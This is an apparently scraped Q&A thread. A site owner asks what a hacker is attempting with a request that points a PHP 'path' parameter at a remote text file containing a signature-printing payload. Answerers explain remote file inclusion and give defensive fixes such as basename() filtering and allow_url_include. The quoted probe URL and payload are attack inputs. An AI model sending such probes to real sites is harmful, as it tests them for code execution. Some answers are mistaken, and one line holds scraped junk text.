What bug does this hacker want to exploit?

A guy called ShiroHige is trying to hacking my website.

He tries to open a page with this parameter:

mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???

If you look at that text file it is just a die(),

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

So what exploit is he trying to use (WordPress?)?

Edit 1:

I know he is trying use RFI.

Is there some popular script that are exp开发者_JAVA百科loitable with that (Drupal, phpBB, etc.)?

An obvious one, just unsanitized include.
He is checking if the code gets executed.
If he finds his signature in a response, he will know that your site is ready to run whatever code he sends.

To prevent such attacks one have to strictly sanitize filenames, if they happen to be sent via HTTP requests.

A quick and cheap validation can be done using basename() function:

if (empty($_GET['page'])) 
    $_GET['page']="index.php";
$page = $modules_dir.basename($_GET['page']).".php";
if (!is_readable($page)) {
    header("HTTP/1.0 404 Not Found");
    $page="404.html";
}
include $page;

or using some regular expression.

There is also an extremely useful PHP configuration directive called

allow_url_include

which is set to off by default in modern PHP versions. So it protects you from such attacks automatically.

The vulnerability the attacker is aiming for is probably some kind of remote file inclusion exploiting PHP’s include and similar functions/construct that allow to load a (remote) file and execute its contents:

Security warning

Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.

Note that using readfile does only avoids that the loaded file is executed. But it is still possible to exploit it to load other contents that are then printed directly to the user. This can be used to print the plain contents of files of any type in the local file system (i.e. Path Traversal) or to inject code into the page (i.e. Code Injection). So the only protection is to validate the parameter value before using it.

See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.

It looks like the attack is designed to print out "ShiroHige" on vulnerable sites.

The idea being, that is you use include, but do not sanitize your input, then the php in this text file is executed. If this works, then he can send any php code to your site and execute it.

A list of similar files can be found here. http://tools.sucuri.net/?page=tools&title=blacklist&detail=072904895d17e2c6c55c4783df7cb4db

He's trying to get your site to run his file. This would probably be an XSS attack? Not quite familiar with the terms (Edit: RFI - Remote file inclusion).

Odds are he doesn't know what he's doing. If there’s a way to get into WordPress, it would be very public by now.

I think its only a first test if your site is vulnerable to external includes. If the echo is printed, he knows its possible to inject code.

You're not giving much detail on the situation and leaving a lot to the imagination.

My guess is that he's trying to exploit allow_url_fopen. And right now he's just testing code to see what he can do. This is the first wave!

I think it is just a malicious URL. As soon as i entered it into my browser, Avast antivirus claimed it to be a malicious url. So that php code may be deceiving or he may just be testing. Other possibility is that the hacker has no bad intentions and just want to show that he could get over your security.